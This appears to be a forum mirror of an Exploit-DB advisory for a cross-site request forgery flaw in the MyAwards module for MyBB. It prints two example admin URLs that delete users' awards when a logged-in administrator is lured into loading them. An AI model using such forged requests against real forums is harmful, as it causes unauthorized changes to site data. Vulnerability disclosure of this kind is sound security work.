- 34,599
- 0
- 18 Дек 2022
- EDB-ID
- 39290
- Проверка EDB
-
- Пройдено
- Автор
- VAGINEER
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- null
- Дата публикации
- 2014-08-22
MyAwards MyBB Module - Cross-Site Request Forgery
Код:
source: https://www.securityfocus.com/bid/69386/info
MyAwards module for MyBB is prone to a cross-site request-forgery vulnerability.
An attacker may exploit this issue to perform certain unauthorized actions. This may lead to further attacks.
Versions prior to MyAwards 2.4 are vulnerable.
https://www.example.com/forum/admin/index.php?module=user-awards&action=awards_delete_user&id=1&awid=1&awuid=2
https://www.example.com/forum/admin/index.php?module=user-awards&action=awards_delete_user&id=1&awuid=1- Источник
- www.exploit-db.com
